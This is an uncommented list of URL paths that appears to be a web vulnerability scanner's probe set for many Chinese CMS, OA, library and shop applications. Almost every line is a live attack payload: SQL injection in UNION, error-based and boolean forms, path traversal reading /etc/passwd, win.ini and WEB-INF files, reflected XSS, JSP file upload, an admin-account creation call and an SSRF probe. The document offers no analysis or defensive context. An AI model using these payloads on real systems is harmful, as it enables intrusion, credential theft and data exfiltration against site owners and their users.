/celive/live/index.php?action=1
/admin/Site/AddDomain.aspx?Edit=1&id=1000/**/%20/**/union/**/%20/**/all/**/%20/**//**/SELECT/**/%200,/**/CHAR(106)%2bCHAR(106)%2bCHAR(106),0,0,'',0,2014,0/**/FROM/**/%20ZL_Manager
/baseNews_view.jsp?newsId=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)%20--
/Lesktop/command.aspx
/Lesktop/Management/DeptEdit.aspx?did=1%20and%20char(106)%3E0
/Lesktop/sendfile.aspx
/Office_Supplies/Goods_Main.aspx?type=1&info_id=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/Infomation.aspx?userid=1/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/Personnel/VacationComputation.aspx?id=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/RCMANAGE_New/rcgl.aspx?UID=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/ObjSwitch/HYTZ.aspx?userid=11/**/AND/**/1122=(SELECT/**/UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT/**/(CASE/**/WHEN/**/(1122=1122)/**/THEN/**/1/**/ELSE/**/0/**/END)/**/FROM/**/DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))/**/FROM/**/DUAL)%20--
/modules/pdflist.aspx?info_id=1/**/union/**/all/**/select/**/null,null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),null,null,null/**/from/**/dual%20--
/jcms/m_5_e/init/sitesearch/opr_classajax.jsp?classid=1%20union%20all%20select%2012,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20from%20dual%20--
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,md5(1122),0x7e),NULL,NULL,NULL,NULL
/lm/sys/opr_secsetorder.jsp?parentid=1%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL%23
/jcms/jcms_files/jcms1/web2/site/module/comment/opr_readfile.jsp?filename=opr_readfile.jsp
/managerNManager.action
/lm/manage/opr_setappraisal.jsp?fn_billstatus=E&vc_setapprid=-2087%20UNION%20ALL%20SELECT%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL%20FROM%20DUAL--
/jcms/m_1_9/column/getgroupuser.jsp?jgid=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100)%20--&spell=2&webid=3&userid=4
/lm/sys/opr_bulletin_show.jsp?vc_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/lm/front/mailpublist.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/jcms/workflow/design/opr_model_class.jsp?fn_billstatus=E&vc_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100),NULL,NULL,NULL%20--
/jcms/m_5_5/m_5_5_1/objectbox/selectx_search.jsp?spell=1%25%27%20union%20all%20select%20null%2Cchr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%20from%20dual%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL%20--
/lm/manage/opr_mailinfo_getsecproperty.jsp?vc_bgmailproperty=1'%20UNION%20ALL%20SELECT%20NULL,NULL,CONCAT(0x7e,0x7765627363616E3A693A66696E64,0x7e)%23
/lm/front/mailwrite_over.jsp?editpagename=/../../../../../../../../../../../../../etc/passwd%00.ftl
/admini/question/question.aspx?ID=25'%20and%20char(106)%2bchar(106)%3E0%20--
/ModifyNewsAction.do?newsID=-12
/plugins/qmail/MailTo.aspx?mail=1%27and%02CHAR(106)%2bCHAR(39)%3E0%02and%02%271%27=%271
/manage/Template/DSManage.aspx
/index.php?id=product&c=project&cate=1&ext[id%3C0%20union%20select%20111,2,3,4,5,6,md5(1122),8,9%20,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--]=1
/api.php?id=_arclist&c=api&f=phpok&param[pid]=41&param[notin]=41)%20Union%20Select%201,md5(1122),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--%20
/admin/admin_adminmodifypwd.aspx
/jcms/m_5_6/ajax_printcol.jsp?cataid=1)%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)%20--
/feform/createprinttemplete.jsp?formid=1'%20AND%204321=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/fenc/syncsubject.jsp?pk_corp=1'%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/indexsearch/filter.jsp?tableId=1%20AND%202047=CONVERT(INT,(SELECT%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)))%20--
/Modules/jycg/SFDB.aspx?sfpjnm=-12'%20UNION%20ALL%20SELECT%20NULL,NULL,CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116),NULL%20--&type=1
/print/search_print_proof.jsp?proof_no=just_sql_test'
/include/user/mulbumentree.asp
/include/user/usertree.asp
/include/zidian/dantree.asp?ZiDian='%20AND%204321%3DCONVERT%28INT%2C%28SELECT%20CHAR%28106%29%2bCHAR%28117%29%2bCHAR%28115%29%2bCHAR%28116%29%2bCHAR%2895%29%2bCHAR%28116%29%2bCHAR%28101%29%2bCHAR%28115%29%2bCHAR%28116%29%29%29%20--
/public/oa_nodebanliren_frm.asp
/include/chaxundetail.asp
/include/user/bdtreemx.asp
/admin/Fileup.aspx?path=notice/upload
/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20UNION%20SELECT%201,2,3,md5%281122%29,5,6,7,8,9%23
/inc/guestbook.php?do=guestbook&t=ajax&mid=1&content=testtesta%E9%8C%A6%27,(select%20concat%280x7c,md5%281122%29,0x7c%29from%20job_admin%20limit%201%29,NOW%28%29,1,1,3,1,if%281=2,1,char%28@%60%27%60%29%29%29%23@%60%27%60
/index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
/hlp/help.asp?HlpCode=1'%20and%201=char(106)%20--
/Code/Common/SysCommonAttach.aspx?Method=GetNewID&IDs=isTrans&tabRecordId=1%27%20AND%201%3DCHAR%28106%29%20--
/ModifyNewsAction.do?newsID=-12'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%20%23
/piw/Site/KeyWordExport.jsp?ids=-111)%20union%20select%20Username,md5%281122%29,222,4444,5555%20from%20zduser%23
/schedule/Entrust.aspx?nidlist=0,1)/**/and/**/1=CHAR(106)%20--
/common/mod/ajax.ashx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=-1'%20and%201=char(106)%20--
/dakai.aspx
/SSSweb/SuggestionCollection/PostSuggestion.aspx?ID=3'%20and%201=char(106)%20--
/Permission/Application_Query_List.aspx?deptName=3'%20and%201=char(106)%20--
/main/model/childcatalog/zxzxinfo.jsp?MailId=13%20UNION%20ALL%20SELECT%20NULL,CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29,NULL,NULL,NULL,NULL,NULL,NULL%20--
/index_page/geren_list_page.aspx?server=1&refid=1'%20AND%201=CHAR(106)%2bCHAR(60)%20--
/website/level3.jsp?tablename=7&infoid=-1'%20UNION%20ALL%20SELECT%20CHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2859%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29--
/varset/modifyTime.asp?varname=&id=495'%20union%20all%20select%201,2,3,0x66696E643A76756C,5,6,7,8,9%20from%20teachers%20--
/getpassword.php?do=login
/api/uc/uc.php?code=380dDbp0QmFDGmUR2ENTw7v%2B1YVER%2BKFyWB3YQN0OARXAr%2BIV4p1g3Ou5yA2CG6k%2BYdUOSb%2BwsiMwU4aqz2Gmtae60ut%2Fw
/servlet/FileDownload?filepath=c:/windows/win.ini&dispname=42873.txt
/servlet/FileDownload?filepath=/etc/passwd&dispname=42873.txt
/index.php?m=register&c=ajax_reg
/api/uc.php?code=8e347f1oWfxZ5isPSs7QBbA78aaJwxZCvdIIfY2niRLsrqrg0dHBfrkRSaOtzGxkncaWtRGPVKjVbHwZJSlI1JFH9WBN5wj%2Fsqj2Xg
/witapprovemanage/apprvaddNew.jsp?flowid=%27%20and%201=2%20UNION%20SELECT%201,2,3,4,char(106)%2bchar(60),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29;--%20-
/nicknamelogin.jsp
/jsearch/viewsnap.jsp?snapname=/../../../../../../../../../../../../../etc/passwd
/lm/objectbox/selectx_groupuserlist.jsp?vc_parid=-42873%27+or+%271%27=%271
/index.php?m=register&c=ajax_reg
/inc/ajax.asp?action=videoscore&id=1%20and%201=2%20union%20select%20CHR(106),CHR(99),3%20from%20%7Bpre%7Dmanager
/ajaxfs.php?tooltip=5254'%20and%20(select%201%20from%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a);%20%23
/utilities.php?tail_lines=50&message_type=-1&go.x=10&go.y=9&refresh=20&reverse=1&filter=%22%3E%25%3Cscript%3Eprompt(42873)%3C/script%3E&page=1&action=view_logfile
/?q=node&destination=node
/UtilServlet?name=-1'%20UNION%20ALL%20SELECT%20NULL,%20CHAR(106)%2bCHAR(117)%2bCHAR(115)%2bCHAR(116)%2bCHAR(95)%2bCHAR(116)%2bCHAR(101)%2bCHAR(115)%2bCHAR(116)--%20&operation=getUserInfo&time=12
/jcms/m_5_e/module/individuation/opr_individuation_unit.jsp?fn_billstatus=B&sub_row=just_test
/govdiropen/jcms_files/jcms1/web1/site/zfxxgk/download/downannals.jsp?name=..././..././..././..././..././..././WEB-INF/ini/merpserver.ini&webid=1&type=1&downname=just_test.txt
/down.aspx?id=(select%20convert(int,(select%20char(106)))%20FROM%20syscolumns)
/api/CheckMemberLogin.ashx?type=mobileisexist
/comm/showpic.php?pic=aHR0cDovL3d3dy5zby5jb20vcm9ib3RzLnR4dA%3D%3D
/LoginCheck.aspx
/NodeProdCategory.aspx?action=GetChildNode&CategoryId=(SELECT%20CHAR(119)%2bCHAR(101)%2bCHAR(98)%2bCHAR(115)%2bCHAR(99)%2bCHAR(97)%2bCHAR(110)%2bCHAR(58)%2bCHAR(105)%2bCHAR(59)%2bCHAR(102)%2bCHAR(105)%2bCHAR(110)%2bCHAR(100))
/index.php?c=api&m=data&auth=finecms&param=action%3Dcache%20name%3DSPACE-MODEL.1%27%5D%3Bprint%28md5%281122%29%29%3B%2f%2f
/Book/user_read.jsp?classId=1'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20and%20'at'='at
/show.jsp?id=5'%20and%20(select%201%20from%20%20(select%20count(*),concat(0x3E7765627363616E3A66696E643C,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%20AND%20'AT'='AT
/NTRdrS_RegistInfo.aspx?BookRecno=1'%20AND%209211=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'AT'='AT
/NTRdrBookRetrInfo.aspx?BookRecno='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20chr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(58)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%7C%7Cchr(106)%20from%20DUAL))%7C%7C'
/NTRdrBookRetrInfo.aspx?BookRecno=18273&NewBIBNO=111%20AND%201122=(SELECT%20UPPER(XMLType(chr(60)%7C%7Cchr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)))%20FROM%20DUAL)&NEWBOOK=newbook
/NTBookRetrTopShowright.aspx?page=1&Index=6&LocLmt=&SrchTab=3&Acurate=3&Key='%7C%7CCTXSYS.DRITHSX.SN(user,(select%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%20from%20DUAL))%7C%7C'&AllName=A++
/zfcgFrame/xx_look.aspx?ID=-1%27%20UNION%20ALL%20SELECT%20char%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29--%20
/AdminP
/lm/front/reg_2.jsp?sysid=/../../WEB-INF/web.xml%00%23
/public/download.asp?filename=../login2.asp/
/Isv.ashx?action=addadmin&adminuser=admin&adminpassword=111111&guid=1
/index.php?controller=block&action=goodsCommend&id=0)%20Union%20select%201,md5(1122)%23
/API/DownloadProducts.ashx
/Brand.aspx?pageIndex=1&sortOrderBy=VistiCounts%20Desc)%20AS%20RowNumber%20FROM%20vw_Hishop_BrowseProductList%20p%20WHERE%20SaleStatus%20=%201)%20T%20WHERE%201=1%20and%201=char(106)%20--
/ProductUnSales.aspx?keywords=uio%2527&tagIds=1_2))%20T%20WHERE%201=1%20and%201=(select%20char(106)%2bchar(106))%20--%20&pageIndex=1
/SubCategory.aspx?TagIds=1%20and%20char(106)%3E1
/MShop/Partial/SuppLogo
/ShoppingHandler.aspx
/bq/Data/BIData.zip
/jphoto/objectbox/selectx_search.jsp?spell=1%25%27%20UNION%20SELECT%20CHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%28106%29%7C%7CCHR%2858%29%7C%7CCHR%2899%29%7C%7CCHR%2899%29%2Cnull%20FROM%20DUAL%20--
/vc/vc/columncount/downfile.jsp?filename=/etc/passwd&savename=webscan.txt
/jact/workflow/design/index.jsp?flowcode=a'%20UNION%20ALL%20SELECT%20CHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(106)%7C%7CCHR(58)%7C%7CCHR(107)%7C%7CCHR(109)%7C%7CCHR(108),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL%20--
/jis/manage/role/opr_approleinfo_user2.jsp?c_id=1'%20UNION%20ALL%20SELECT%20NULL,CHAR(101)%2bCHAR(102)%2bCHAR(58)%2bCHAR(104)%2bCHAR(103)%2bCHAR(58)%2bCHAR(105),NULL,NULL--%20
/cms/voteManager/voteaction.jsp
/EditPhotoHandle.aspx?Action=EditCover&PhotoId=(SELECT%20CHAR(106)%2bCHAR(107))
/ShopManage.aspx
/RegionHandle.aspx?action=GetChildNode&ParentId=(select%20%20(char(106)%2bchar(100)))
/SNS/Product/WaterfallProductListData
/ProSales/GetListCate
/jphoto/jphoto/sys/member/opr_export.jsp
/JwGl/jxjh/JxjhXGBc.asp
/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500-52-25-1.html
/defaultroot/site/templatemanager/downloadhttp.jsp?fileName=../index.jsp
/defaultroot/public/select_user/search_org_list.jsp?searchName=a%27%20UNION%20ALL%20SELECT%20CONCAT%280x23%2C0x7765627363616E3A693A66696E64%2C0x23%29%2CNULL%23
/defaultroot/govezoffice/gov_documentmanager/jigeObj.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(108)%2bCHAR(109)%2bCHAR(110),NULL,NULL,NULL,NULL,NULL,NULL--
/cjcx/xuesheng/czjl/shuru.asp?id=-28%20UNION%20ALL%20SELECT%20CHAR(106)%2bCHAR(106)%2bCHAR(106)%2bCHAR(58)%2bCHAR(58)%2bCHAR(100)%2bCHAR(100)%2bCHAR(60)%20--&xueke=
/cjcx/bkxt/yqts1.asp?newsid=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/bkxt/xxpj.asp?id=(SELECT%20CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))
/cjcx/kagx/main3.asp?rjxk=dd'%20and%201=(CHAR(113)%2bCHAR(104)%2bCHAR(101)%2bCHAR(107)%2bCHAR(113)%2bCHAR(113)%2bCHAR(118)%2bCHAR(109)%2bCHAR(99)%2bCHAR(58))%20--&xqmc=%25&jsxm=&mc=&ktlx=&page=
/login.asp
/search.php
/LoginCheck4.asp?LoginLb=jwc&Account=1'%20AND%201=CHAR(106)%20--&PassWord=0
/jwgl/jxjh/jxjha.asp
/jwgl/jcxx/savetofile.asp
/public/jsp/livephotoupload.jsp?path=archives&mode=add&hiddenName=1.jsp&visualName=2.jsp
/Help.aspx?id=(SELECT%20CHAR(106)%2bCHAR(103)%2bCHAR(105)%2bCHAR(100))
/govezoffice/gov_documentmanager/senddocument_import.jsp?categoryId=1&path=archives&mode=add&fileName=1.jsp&saveName=2.jsp&fileMaxSize=0&fileMaxNum=100&fileType=jsp
/edoas2/edoas2_test.jsp
/Report/AjaxHandle/StationChoose/StationTree.ashx?STTP='KKK')%20AND%201587=CONVERT(INT,(CHAR(58)%2bCHAR(117)))%20--&RadioType=Radio_XZ&ReportID=Report22
/celive/live/header.php
/SystemManage/AjaxHandle/AjaxVertifyUserID.ashx?uid=1'%20AND%201=CHAR(106)%20--
/skywcm/webpage/download.jsp?absolutePath=C:%5Cwindows%5Cwin.ini&downFileName=win.ini
/RdrRInforDetail.aspx?page=1&Index=4&KeyWord=AA'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20--&name=r_infor&AcqSys=CN
/m/info/top_rating.action?clsNo=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(103)%7C%7CCHR(102)%7C%7CCHR(103)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(106)%7C%7CCHR(107)%7C%7CCHR(55)))%20FROM%20DUAL)%20AND%20'at'='at
/BaseCourse/RushTeamCollect.aspx?adcd=1&key=1%25'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/Plan/FloodPlan/FileEdit.aspx?id=1'%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--
/BaseCourse/FloodDisastersQueryContent.aspx?areacode=1&DirTypeDetailId=1%20AND%20CHAR(106)%2bCHAR(109)%2bCHAR(106)%3E0--&Name=1
/Disaster/Reporting/ReportingDetail.aspx?ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Disaster/Reporting/ReportingInfo.aspx?oper=update&ID=1'%20AND%203=CHAR(101)%2bCHAR(105)%2bCHAR(106)%20--
/Duty/AjaxHandle/Jquery.autocomplete/AutocompleteContactByName.ashx?_=&q=313%25'%20AND%203=CHAR(106)%2bCHAR(99)%20--&limit=10&timestamp=
/plan/FloodPlan/FloodPlanFileShow.aspx?ReadOnly=&ID=499'%20AND%203=CHAR(106)%2bCHAR(99)%20--&filetype=156&ParentID=0&adomParameter=292
/admin/admin_database.aspx
/flex/newsmessage.jsp?uname=-1122'%20AND%2012=(SELECT%20CHAR(99))%20--
/video/videoView.jsp?videoid=250%20AND%201=(SELECT%20CHAR(106)%2bCHAR(58))
/blue_show.aspx?paperName=hehe'%20and%201=(select%20char(106))%20--&qnum=20
/?m=product&s=list&key=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%23
/search.do?searchInfo=12'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/ModifyNewsAction.do?newsID=364'%20and%201=(updatexml(1,concat(0x5e24,(select%20md5(1122)),0x5e24),1))%20%23
/navigate.do?method=getPolicyinfoDataById&id=2631&menuNo=05'%20and%201=(select%20char(106))%20--
/model/TwoGradePage/Equipment_detail.aspx?id=11314%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/TrainSignUp.aspx?tblApparatusRepertoryListID=12%20and%201=(select%2bchar(106))%20--
/model/TwoGradePage/newsdetail.aspx?id=279&columnId=70%20and%201=(select%2bchar(106))
/cctrl/admin/news/contShow.php?id=2'%20and%20(select%201%20from%20%20(select%20count(*),concat(md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a);%23
/cctrl/backup/index.php
/cctrl/admin/purview/purview.php
/data_Xbaby/gdjm133950.mdb
/admin/message_der.asp?id=7%20union%20select%201,chr(97),chr(106),4,5%20from%20admin
/admin/fuwu_der.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/fuwu_modi.asp?id=5%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHR%28113%29%26CHR%28111%29%26CHR%28122%29%26CHR%28111%29%26CHR%28113%29%26CHR%28117%29%26CHR%2877%29%26CHR%28111%29%26CHR%28113%29%2CNULL%2CNULL%20FROM%20MSysAccessObjects%16
/admin/upfile.asp
/admin/upfile_yqhy.asp
/FWeb/WorkRoomWeb/Web/TeacherSource.aspx?tid=-1%20AND%201=(SELECT%20CHAR(106)%2bCHAR(67))%20--
/FWeb/SPEWeb/Web5/SPEVideosDetail.aspx?KindSetID=30000&VideoID=105%20and%201=(SELECT%20CHAR(86)%2bCHAR(105))
/FWeb/WorkRoomWeb/Web/TeacherCourse.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlog.aspx?tid=101%20AND%201=(SELECT%20CHAR(89)%2bCHAR(105))--
/FWeb/WorkRoomWeb/Web/TeacherBlogDetail.aspx?tid=101%20AND%201=(SELECT%20CHAR(106)%2bCHAR(79))&diaryID=1
/VIEWGOOD/ADI/portal/UserDataSync.aspx
/SPM/Pc/Content/Request.aspx?action=name_check
/VIEWGOOD/ADI/portal/GetCaption.ashx?CaptionType=1'%20AND%20(SELECT%20CHAR(86))%3E0--&AssetID=1&CaptionName=1
